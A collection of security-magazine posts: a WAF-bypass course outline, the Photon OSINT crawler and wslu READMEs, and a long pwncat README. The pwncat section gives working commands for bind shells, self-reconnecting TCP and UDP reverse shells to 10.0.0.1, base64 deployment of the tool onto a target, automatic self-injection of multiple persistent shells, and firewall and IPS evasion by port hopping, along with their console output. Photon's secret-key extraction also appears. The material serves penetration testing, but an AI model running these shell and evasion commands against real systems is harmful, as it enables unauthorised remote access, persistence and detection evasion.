In this video from our Bypassing Web Application Firewall course your instructor, Thomas Sermpinis, shows how to install and use a popular WAFNinja tool. You can use it for automating web application bypass during your pentests. Let's go! 



Nowadays, the number of web application firewalls (or simply WAFs) is increasing, which results in a more difficult penetration test from our side. So, it becomes a necessity and really important to be able to bypass WAFs in a penetration test. In this course, we are going to examine practical approaches in bypassing WAFs as a part of our penetration test, and, of course, the theory behind WAFs and how they work.

What will you learn?

  • WAF Bypassing
  • How WAFs work
  • How to implement WAF Bypassing to our penetration test

What skills will you gain?

  • WAF Bypassing and Hacking
  • WAF Hardening and Securing

Introduction WAFs, WAF Bypassing and techniques

In this module, we will quickly examine how WAFs work in a web server, and we will be introduced to WAF Bypassing and some interesting methods with practical examples, attacking web application firewalls with conventional methods.

  • Introduction to WAFs, WAF types and WAF Bypassing
  • WAF Fingerprinting
  • Automating WAF Fingerprinting with Burp, Nmap and wafw00f
  • WAF Bypassing, with tools like WAFninja

WAF Bypassing with SQL Injection

In module 2, we examine how we can bypass WAF by exploiting SQL Injection vulnerabilities, with various ways such as normalization and HTTP Parameter Pollution.

  • HTTP Parameter Pollution – HPP
  • Encoding Techniques for Bypassing WAF
  • Bypassing WAF with SQL Injection
  • HTTP Parameter Fragmentation – HPF
  • Bypassing WAFs with SQL Injection Normalization
  • Buffer Overflow + SQL Injection = Bypass WAF

WAF Bypassing with XSS and RFI

In module 3, we will examine more ways of WAF Bypassing, this time containing the Remote File Inclusion and the Cross-Site Scripting and more.

  •  Cross Site Scripting - XSS
  • Reflected Cross Site Scripting
  • Stored Cross-site Scripting
  • Path Traversal
  • Remote and Local File Inclusion

Securing WAF and Conclusion

Finally, in module 4, we will see some final methods for bypassing WAFs, and prevention methods with practical examples for our WAF implementations.

  • DOM Based XSS
  • Bypassing Blacklists with JavaScript
  • Automating WAF Bypassing
  • Bypassing WAF Practical Examples (Imperva WAF, Aqtronix WebKnight WAF, ModSecurity WAF, and others)
  • Conclusion and final exam

Related content:

None found

The post Bypassing WAFs with WAFNinja [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.


Photon - Incredibly fast crawler designed for OSINT

$
0
0

Photon is a relatively fast crawler designed for automating OSINT (Open Source Intelligence) with a simple interface and tons of customization options. It’s written in Python. Photon essentially acts as a web crawler which is able to extract URLs with parameters, also able to fuzz them, secret AUTH keys, and a lot more.

Compatibility

Python Versions

Photon is fully compatible with Python versions 2.x - 3.x at present but will most likely end up deprecating python2.x support in the future as this project is under heavy development and may require features that aren't available in python2.

Operating Systems

Photon has been tested on Linux (Arch, Debian, Ubuntu), Termux, Windows (7 & 10), Mac, and works as expected. Feel free to report any bugs you encounter.

Colors

Mac & Windows don't support ANSI escape sequences so the output won't be colored on Mac & Windows.

Dependencies

  • TLD
  • requests

The rest of the python libraries used by Photon are standard libraries that come preinstalled with a python interpreter.

Installing Photon

To install Photon all you have to do is clone the Github repository, install the dependencies, and run the script.

git clone https://github.com/s0md3v/photon.git

Key Features

Data Extraction

Photon can extract the following data while crawling:

  • URLs (in-scope & out-of-scope)
  • URLs with parameters (example.com/gallery.php?id=2)
  • Intel (emails, social media accounts, amazon buckets etc.)
  • Files (pdf, png, xml etc.)
  • Secret keys (auth/API keys & hashes)
  • JavaScript files & Endpoints present in them
  • Strings matching custom regex pattern
  • Subdomains & DNS related data

The extracted information is saved in an organized manner or can be exported as json.

Flexible

Control timeout, delay, add seeds, exclude URLs matching a regex pattern and other cool stuff. The extensive range of options provided by Photon lets you crawl the web exactly the way you want.

Genius

Photon's smart thread management & refined logic gives you top-notch performance.

Still, crawling can be resource-intensive but Photon has some tricks up its sleeves. You can fetch URLs archived by archive.org to be used as seeds by using --wayback option.

Plugins

Docker

Photon can be launched using a lightweight Python-Alpine (103 MB) Docker image.

$ git clone https://github.com/s0md3v/Photon.git
$ cd Photon
$ docker build -t photon .
$ docker run -it --name photon photon:latest -u google.com

To view results, you can either head over to the local docker volume, which you can find by running docker inspect photonor by mounting the target loot folder:

$ docker run -it --name photon -v "$PWD:/Photon/google.com" photon:latest -u google.com

Frequent & Seamless Updates

Photon is under heavy development and updates for fixing bugs. optimizing performance & new features are being rolled regularly.

If you would like to see features and issues that are being worked on, you can do that on the Development project board.

Updates can be installed & checked for with the --update option. Photon has seamless update capabilities which means you can update Photon without losing any of your saved data.

Usage

usage: photon.py [options]

  -u --url              root url
  -l --level            levels to crawl
  -t --threads          number of threads
  -d --delay            delay between requests
  -c --cookie           cookie
  -r --regex            regex pattern
  -s --seeds            additional seed urls
  -e --export           export formatted result
  -o --output           specify output directory
  -v --verbose          verbose output
  --keys                extract secret keys
  --clone               clone the website locally
  --exclude             exclude urls by regex
  --stdout              print a variable to stdout
  --timeout             http requests timeout
  --ninja               ninja mode
  --update              update photon
  --headers             supply http headers
  --dns                 enumerate subdomains & dns data
  --only-urls           only extract urls
  --wayback             Use URLs from archive.org as seeds
  --user-agent          specify user-agent(s)

Crawl a single website

Option: -u or --url

Crawl a single website.

python photon.py -u "http://example.com"

Clone the website locally

Option: --clone The crawled webpages can be saved locally for later use by using the --cloneswitch as follows

python photon.py -u "http://example.com" --clone

Depth of crawling

Option: -l or --level | Default: 2

Using this option user can set a recursion limit for crawling. For example, a depth of 2 means Photon will find all the URLs from the homepage and seeds (level 1) and then will crawl those levels as well (level 2).

python photon.py -u "http://example.com" -l 3

Number of threads

Option: -t or --threads | Default: 2

It is possible to make a concurrent request to the target and -t the option can be used to specify the number of concurrent requests to make. While threads can help to speed up crawling, they might also trigger security mechanisms. A high number of threads can also bring down small websites.

python photon.py -u "http://example.com" -t 10

The delay between each HTTP request

Option: -d or --delay | Default: 0

It is possible to specify the number of seconds to hold between each HTTP(S) request. The valid value is a int, for instance, 1 means a second.

python photon.py -u "http://example.com" -d 2

Timeout

Option: --timeout | Default: 5

It is possible to specify the number of seconds to wait before considering the HTTP(S) request timed out.

python photon.py -u "http://example.com --timeout=4

Cookies

Option: -c or --cookies | Default: no cookie header is sent

This option lets you add a Cookie header to each HTTP request made by Photon in non-ninja mode.
It can be used when certain parts of the target website require authentication based on Cookies.

python photon.py -u "http://example.com" -c "PHPSESSID=u5423d78fqbaju9a0qke25ca87"

Specify the output directory

Option: -o or --output | Default: domain name of target

Photon saves the results in a directory named after the domain name of the target but you can overwrite this behavior by using this option.

python photon.py -u "http://example.com" -o "mydir"

Verbose output

Option: -v or --verbose

In verbose mode, all the pages, keys, files, etc. will be printed as they are found.

python photon.py -u "http://example.com" -v

Exclude specific URLs

Option: --exclude

URLs matching the specified regex will not be crawled or showed in the results at all.

python photon.py -u "http://example.com" --exclude="/blog/20[17|18]"

Specify seed URL(s)

Option: -s or --seeds

You can add custom seed URL(s) with this option, separated by commas.

python photon.py -u "http://example.com" --seeds "http://example.com/blog/2018,http://example.com/portals.html"

Specify user-agent(s)

Option: --user-agent | Default: entries from user-agents.txt

You can use your own user agent(s) with this option, separated by commas.

python photon.py -u "http://example.com" --user-agent "curl/7.35.0,Wget/1.15 (linux-gnu)"

This option is only present to aid the user to use a specific user agent without modifying the default user-agents.txt file.

Custom regex pattern

Option: -r or --regex

It is possible to extract strings during crawling by specifying a regex pattern with this option.

python photon.py -u "http://example.com" --regex "\d{10}"

Export formatted result

Option: -e or --export

With -e the option you can specify an output format in which the data will be saved.

python photon.py -u "http://example.com" --export=json

Currently supported formats are:

  • JSON
  • CSV

Use URLs from archive.org as seeds

Option: --wayback

This option makes it possible to fetch archived URLs from archive.org and use them as seeds. Only the URLs crawled within the current year will be fetched to make sure they aren't dead.

python photon.py -u "http://example.com" --wayback

Skip data extraction

Option: --only-urls

This option skips the extraction of data such as intel and js files. It should come in handy when your goal is to only crawl the target.

python photon.py -u "http://example.com" --only-urls

Update

Option: --update

If this option is enabled, photon will check for updates. If a newer version will available, Photon will download and merge the updates into the current directory without overwriting other files.

python photon.py --update

Extract secret keys

Option: --keys

This switch tells Photon to look for high entropy strings which can be some kind of auth or API keys or hashes.

python photon.py -u http://example.com --keys

Piping (Writing to stdout)

Option: --stdout

You can write a variety of choices to stdout for piping with other programs.
Following variables are supported:

files, intel, robots, custom, failed, internal, scripts, external, fuzzable, endpoints, keys

python photon.py -u http://example.com --stdout=custom | resolver.py

Ninja Mode

Option: --ninja

This option enables Ninja mode. In this mode, Photon uses the following websites to make requests on your behalf.

Contrary to the name, it doesn't stop you from making requests to the target.\

Dumping DNS data

Option: --dns

Saves subdomains in 'subdomains.txt' and also generates an image displaying the target domain's DNS data.

python photon.py -u http://example.com --dns

Sample Output:

Contribution & License

You can contribute in the following ways:

  • Report bugs
  • Develop plugins
  • Add more "APIs" for ninja mode
  • Give suggestions to make it better
  • Fix issues & submit a pull request

Please read the guidelines before submitting a pull request or issue.

Do you want to have a conversation in private? Hit me up on my twitter, the inbox is open :)

The post Photon - Incredibly fast crawler designed for OSINT appeared first on Hakin9 - IT Security Magazine.

wslu - A collection of utilities for Windows 10 Linux Subsystems

$
0
0

wslu - is a collection of utilities for Windows 10 Linux Subsystem, such as retrieving Windows 10 environment variables or creating your favorite Linux GUI application shortcuts on Windows 10 Desktop.

Requires Windows 10 Creators Update. Some of the features require a higher version of Windows 10. Supports WSL2.

Feature

wslusc

A WSL shortcut creator to create a shortcut on your Windows 10 Desktop.

wslsys

A WSL system information printer to print out system information from Windows 10 or WSL.

wslfetch

A WSL screenshot information tool to print information in an elegant way.

wslvar

A WSL tool to help you get Windows system environment variables.

wslview

With alias wview/wslstart/wstart

A fake WSL browser that can help you open links in default Windows browser or open files on Windows.

wslupath

⚠ Deprecated

A WSL tool to convert path styles.

wslact

A set of quick actions for WSL such as quickly mounting all drives or manually sync time between Windows and WSL.

Installation

Alpine Linux

You can install wslu from Alpine Linux community with the following command:

$ echo "@testing http://dl-cdn.alpinelinux.org/alpine/edge/community/" | sudo tee -a /etc/apk/repositories
$ sudo apk update
$ sudo apk add wslu@testing

Arch Linux

wslu and wslu-git on AUR.

CentOS/RHEL

Add the repository for the corresponding Linux distribution:

  • CentOS 7: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/CentOS_7/home:wslutilities.repo
  • CentOS 8: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/CentOS_8/home:wslutilities.repo
  • Red Hat Enterprise Linux 7: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/RHEL_7/home:wslutilities.repo

Then install with the command sudo yum install wslu.

Debian

You can install wslu with the following command:

sudo apt install gnupg2 apt-transport-https
wget -O - https://access.patrickwu.space/wslu/public.asc | sudo apt-key add -
echo "deb https://access.patrickwu.space/wslu/debian buster main" | sudo tee -a /etc/apt/sources.list
sudo apt update
sudo apt install wslu

Fedora Remix

You can install wslu from COPR with the following command:

sudo dnf copr enable wslutilities/wslu
sudo dnf install wslu

Kali Linux

You can install wslu with the following command:

sudo apt install gnupg2 apt-transport-https
wget -O - https://access.patrickwu.space/wslu/public.asc | sudo apt-key add -
echo "deb https://access.patrickwu.space/wslu/kali kali-rolling main" | sudo tee -a /etc/apt/sources.list
sudo apt update
sudo apt install wslu

Pengwin

Preinstalled.

Pengwin Enterprise

You can install wslu with the following command:

sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/ScientificLinux_7/home:wslutilities.repo
sudo yum install wslu

Ubuntu

Attention!

The Ubuntu version of wslu is a modified version. You should report bug here.

Preinstalled in the latest apps. On older installations of Ubuntu please install ubuntu-wsl that depends on wslu:

sudo apt update
sudo apt install ubuntu-wsl

OpenSUSE

You can install wslu with the following command:

sudo zypper addrepo https://download.opensuse.org/repositories/home:/wslutilities/openSUSE_Leap_15.1/home:wslutilities.repo
sudo zypper up
sudo zypper in wslu

SUSE Linux Enterprise Server

You can install wslu with the following command:

SLESCUR_VERSION="$(grep VERSION= /etc/os-release | sed -e s/VERSION=//g -e s/\"//g -e s/-/_/g)"
sudo zypper addrepo https://download.opensuse.org/repositories/home:/wslutilities/SLE_$SLESCUR_VERSION/home:wslutilities.repo
sudo zypper addrepo https://download.opensuse.org/repositories/graphics/SLE_12_SP3_Backports/graphics.repo
sudo zypper up
sudo zypper in wslu

Other distributions

⚠ Not Recommend

curl | bash method is not secure. Related article

You can install wslu with the following command on your preferred distribution: curl -sL https://raw.githubusercontent.com/wslutilities/wslu/master/extras/scripts/wslu-install | bash 


More: https://github.com/wslutilities/wslu

The post wslu - A collection of utilities for Windows 10 Linux Subsystems appeared first on Hakin9 - IT Security Magazine.

pwncat - netcat on steroids with Firewall, IDS/IPS evasion, and its fully scriptable with Python (PSE)

$
0
0

Pwncat is a sophisticated bind and reverses shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat.

Motivation

Ever accidentally hit Ctrl+c on your reverse shell and it was gone for good? Ever waited forever for your client to connect back to you, because the Firewall didn't let it out? Ever had a connection loss because an IPS closed suspicious ports? Ever were in need of a quick port forwarding?

Apart from that the current features of nc, ncat or socat just didn't feed my needs and I also wanted to have a single tool that works on older and newer machines (hence Python 2+3 compat). Most importantly I wanted to have it in a language that I can understand and provide my own features with. (Wait for it, binary releases for Linux, MacOS, and Windows will come shortly).

🎉 Install Pwncat

pip install pwncat

☕ TL;DR

This is just a quick get-you-started overview. For more advanced techniques see 💻 Usage or 💡 Examples.

See in action

Deploy to target

# Copy base64 data to clipboard from where you have internet access
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64

# Paste it on the target machine
echo "<BASE64 STRING>" | base64 -d > pwncat
chmod +x pwncat

Inject to target

# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445

[1] Read in more detail about self-injection

Summon shells

# Bind shell (accepts new clients after disconnect)
pwncat -l -e '/bin/bash' 8080 -k
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1

Port scan

# [TCP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080
pwncat -z 10.0.0.1 1-65535
pwncat -z 10.0.0.1 1+1023

# [UDP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080 -u
pwncat -z 10.0.0.1 1-65535 -u
pwncat -z 10.0.0.1 1+1023 -u

# Use only IPv6 or IPv4
pwncat -z 10.0.0.1 1-65535 -4
pwncat -z 10.0.0.1 1-65535 -6 -u

# Add version detection
pwncat -z 10.0.0.1 1-65535 --banner

Local port forward -L (listening proxy)

# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u

Remote port forward -R (double client proxy)

# Connect to Remote MySQL server (remote port 3306) and then connect to another
# pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
pwncat -R 10.0.0.1:4444 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u

SSH Tunnelling for fun and profit 🔗
pwncat example: Port forwarding magic

⭐ Features

At a glance

pwncat has many features, below is only a list of outstanding characteristics.

Feature Description
PSE Fully scriptable with Pwncat Scripting Engine to allow all kinds of fancy stuff on send and receive
port scanning TCP und UDP port scanning with basic version detection support
Self-injecting rshell Self-injecting mode to deploy itself and start an unbreakable reverse shell back to you automatically
Bind shell Create bind shells
Reverse shell Create reverse shells
Port Forward Local and remote port forward (Proxy server/client)
Ctrl+c Reverse shell can reconnect if you accidentally hit Ctrl+c
Detect Egress Scan and report open egress ports on the target (port hopping)
Evade FW Evade egress firewalls by round-robin outgoing ports (port hopping)
Evade IPS Evade Intrusion Prevention Systems by being able to round-robin outgoing ports on connection interrupts (port hopping)
UDP rev shell Try this with the traditional netcat
Stateful UDP Stateful connect phase for UDP client mode
TCP / UDP Full TCP and UDP support
IPv4 / IPv6 Dual or single stack IPv4 and IPv6 support
Python 2+3 Works with Python 2, Python 3, pypy2 and pypy3
Cross OS Work on Linux, MacOS and Windows as long as Python is available
Compatability Use the netcat, ncat or socat as a client or server together with pwncat
Portable Single file which only uses core packages - no external dependencies required.

Feature comparison matrix

pwncat netcat ncat socat
Scripting engine ✔ Python ❌ ✔ Lua ❌
IP ToS ✔ ✔ ❌ ✔
IPv4 ✔ ✔ ✔ ✔
IPv6 ✔ ✔ ✔ ✔
Unix domain sockets ❌ ✔ ✔ ✔
Linux vsock ❌ ❌ ✔ ❌
Socket source bind ✔ ✔ ✔ ✔
TCP ✔ ✔ ✔ ✔
UDP ✔ ✔ ✔ ✔
SCTP ❌ ❌ ✔ ✔
SSL ❌ ❌ ✔ ✔
HTTP * ❌ ❌ ❌
HTTPS * ❌ ❌ ❌
Telnet negotiation ❌ ✔ ✔ ❌
Proxy support ❌ ✔ ✔ ✔
Local port forward ✔ ❌ ❌ ✔
Remote port forward ✔ ❌ ❌ ❌
Inbound port scan ✔ ✔ ✔ ❌
Outbound port scan ✔ ❌ ❌ ❌
Version detection ✔ ❌ ❌ ❌
Chat ✔ ✔ ✔ ✔
Command execution ✔ ✔ ✔ ✔
Hex dump * ✔ ✔ ✔
Broker ❌ ❌ ✔ ❌
Simultaneous conns ❌ ❌ ✔ ✔
Allow/deny ❌ ❌ ✔ ✔
Re-accept ✔ ✔ ✔ ✔
Self-injecting ✔ ❌ ❌ ❌
UDP reverse shell ✔ ❌ ❌ ❌
Respawning client ✔ ❌ ❌ ❌
Port hopping ✔ ❌ ❌ ❌
Emergency shutdown ✔ ❌ ❌ ❌

* Feature is currently under development.

👮 Behavior

Like the original implementation of netcat, when using TCP, pwncat (in client and listen mode) will automatically quit, if the network connection has been terminated, properly or improperly. In case the remote peer does not terminate the connection, or in UDP mode, pwncatwill stay open.

Have a look at the following commands to better understand this behavior:

# [Valid HTTP request] Does not quit, web server keeps connection intact
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80
# [Invalid HTTP request] Quits, because the web server closes the connection
printf "GET / \n\n" | pwncat www.google.com 80
# [TCP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will quit as well.
pwncat -l 4444 > output.txt
pwncat localhost 4444 < input.txt
# [UDP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt

There are many ways to alter this default behavior. Have a look at the usage section for more advanced settings.

📕 Documentation

Documentation will evolve over time.

💻 Usage

Type pwncat -h or click below to see all available options.

💡 Examples

Upgrade your shell to interactive

This is a universal advice and not only works with pwncat, but with all other common tools.

When connected with a reverse or bind shell you'll notice that no interactive commands will work and hitting Ctrl+c will terminate your session. To fix this, you'll need to attach it to a TTY (make it interactive). Here's how:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Ctrl+z

# get your current terminal size (rows and columns)
stty size

# for bash/sh (enter raw mode and disable echo'ing)
stty raw -echo
fg

# for zsh (enter raw mode and disable echo'ing)
stty raw -echo; fg

reset
export SHELL=bash
export TERM=xterm
stty rows <num> columns <cols>   # <num> and <cols> values found above by 'stty size'

[1] Reverse Shell Cheatsheet

UDP reverse shell

Without tricks, a UDP reverse shell is not really possible. UDP is a stateless protocol compared to TCP and does not have a connect() method as TCP does. In TCP mode, the server will know the client IP and port, once the client issues a connects(). In UDP mode, as there is no connect(), the client simply sends data to an address/port without having to connect first. Therefore, in UDP mode, the server will not be able to know the IP and port of the client and hence, cannot send data to it first. The only way to make this possible is to have the client send some sort of data to the server first so that the server can see what IP/port has sent data to it.

pwncat emulates the TCP connect() by having the client send a null byte to the server once or periodically via --ping-intvl or --ping-init.

# The client
# --exec            # Provide this executable
# --udp             # Use UDP mode
# --ping-init       # Send an initial null byte to the server
pwncat --exec /bin/bash --udp --ping-init 10.0.0.1 4444

Unbreakable TCP reverse shell

Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep trying to connect to the specified server until success. If the connection is interrupted, it will keep trying again.

# The client
# --exec            # Provide this executable
# --nodns           # Keep the noise down and don't resolve hostnames
# -reconn          # Automatically reconnect back to you indefinitely
# --reconn-wait     # If connection is lost, connect back to you every 2 seconds

pwncat --exec /bin/bash --nodns --reconn --reconn-wait 2 10.0.0.1 4444

Unbreakable UDP reverse shell

Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep sending null bytes to the server to constantly announce itself.

# The client
# --exec            # Provide this executable
# --nodns           # Keep the noise down and don't resolve hostnames
# --udp             # Use UDP mode
# --ping-intvl      # Ping the server every 2 seconds

pwncat --exec /bin/bash --nodns --udp --ping-intvl 2 10.0.0.1 4444

Self-injecting reverse shell

Let's imagine you are able to create a very simple and unstable reverse shell from the target to your machine, such as a web shell via a PHP script or similar. Knowing, that this will not persist very long or might break due to unstable network connection, you could use pwncat to hook into this connection and deploy itself unbreakably on the target - fully automated.

All you have to do is use pwncat as your local listener and start it with the --self-inject switch. As soon as the client (e.g.: the reverse web shell) connects to it, it will do a couple of things:

  1. Enumerate Python availability and versions on the target
  2. Dump itself base64 encoded onto the target
  3. Use the target's Python to decode itself.
  4. Use the target's Python to start itself as an unbreakable reverse shell back to you

Once this is done, you can keep using the current connection or simply abandon it and start a new listener (yes, you don't need to start the listener before starting the reverse shell) to have the new pwncat client connects to you. The new listener also doesn't have to be pwncat, it can also be netcat or ncat.

The --self-inject switch:

pwncat -l 4444 --self-inject <cmd>:<host>:<port>
  • <cmd>: This is the command to start on the target (like -e/--exec, so you want it to be cmd.exe or /bin/bash)
  • <host>: This is for your local machine, the IP address to where the reverse shell shall connect back to
  • <port>: This is for your local machine, the port on which the reverse shell shall connect back to

So imagine your Kali machine is 10.0.0.1. You instruct your webshell that you inject onto a Linux server to connect to you at port 4444:

# Start this locally, before starting the reverse webshell
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445

You will then see something like this:

[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &

And you are set. You can now start another listener locally at 4445 (again, it will connect back to you endlessly, so it is not required to start the listener first).

# either netcat
nc -lp 4445
# or ncat
ncat -l 4445
# or pwncat
pwncat -l 4445

Unlimited self-injecting reverse shells

Instead of just asking for a single self-injecting reverse shell, you can instruct pwncat to spawn as many unbreakable reverse shells connecting back to you as you desire.

The --self-inject argument allows you to not only define a single port, but also

  1. A comma separated list of ports: 4445,4446,4447,4448
  2. A range definition: 4446-4448
  3. An increment: 4445+3

In order to spawn 4 reverse shells you would start your listener just as described above, but instead of a single port, you define multiple:

# Comma separated
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445,4446,4447,4448

# Range
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445-4448

# Increment
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445+3

Each of the above three commands will achieve the same behavior: spawning 4 reverse shells inside the target. Once the client connects, the output will look something like this:

[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4446 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4447 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4448 &

Logging

Note: Ensure you have a reverse shell that keeps coming back to you. This way you can always change your logging settings without loosing the shell.

Log level and redirection

If you feel like, you can start a listener in full TRACE logging mode to figure out what's going on or simply to troubleshoot. Log message are colored depending on their severity. Colors are automatically turned off, if stderr is not a pty, e.g.: if piping those to a file. You can also manually disable colored logging for terminal outputs via the --color switch.

pwncat -vvvv -l 4444

You will see (among all the gibberish) a TRACE message:

2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output

As soon as you saw this on the listener, you can issue commands to the client. All the debug messages are also not necessary, so you can safely Ctrl+c terminate your server and start it again in silent mode:

pwncat -l 4444

Now wait a maximum a few seconds, depending at what interval the client comes back to you and voila, your session is now again without logs.

Having no info messages at all, is also sometimes not desirable. You might want to know what is going on behind the scenes or? Safely Ctrl+c terminate your server and redirect the notifications to a logfile:

pwncat -l -vvv 4444 2> comm.txt

Now all you'll see in your terminal session are the actual command inputs and outputs. If you want to see what's going on behind the scene, open a second terminal window and tail the comm.txt file:

# View communication info
tail -fn50 comm.txt

2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output

Socket information

Another useful feature is to display currently configured socket and network settings. Use the --info switch with either socket, ipv4, ipv6, tcp or all to display all available settings.

Note: In order to view those settings, you must at least be at INFO log level (-vv).

An example output in IPv4/TCP mode without any custom settings is shown below:

INFO: [bind-sock] Sock: SO_DEBUG: 0
INFO: [bind-sock] Sock: SO_ACCEPTCONN: 1
INFO: [bind-sock] Sock: SO_REUSEADDR: 1
INFO: [bind-sock] Sock: SO_KEEPALIVE: 0
INFO: [bind-sock] Sock: SO_DONTROUTE: 0
INFO: [bind-sock] Sock: SO_BROADCAST: 0
INFO: [bind-sock] Sock: SO_LINGER: 0
INFO: [bind-sock] Sock: SO_OOBINLINE: 0
INFO: [bind-sock] Sock: SO_REUSEPORT: 0
INFO: [bind-sock] Sock: SO_SNDBUF: 16384
INFO: [bind-sock] Sock: SO_RCVBUF: 131072
INFO: [bind-sock] Sock: SO_SNDLOWAT: 1
INFO: [bind-sock] Sock: SO_RCVLOWAT: 1
INFO: [bind-sock] Sock: SO_SNDTIMEO: 0
INFO: [bind-sock] Sock: SO_RCVTIMEO: 0
INFO: [bind-sock] Sock: SO_ERROR: 0
INFO: [bind-sock] Sock: SO_TYPE: 1
INFO: [bind-sock] Sock: SO_PASSCRED: 0
INFO: [bind-sock] Sock: SO_PEERCRED: 0
INFO: [bind-sock] Sock: SO_BINDTODEVICE: 0
INFO: [bind-sock] Sock: SO_PRIORITY: 0
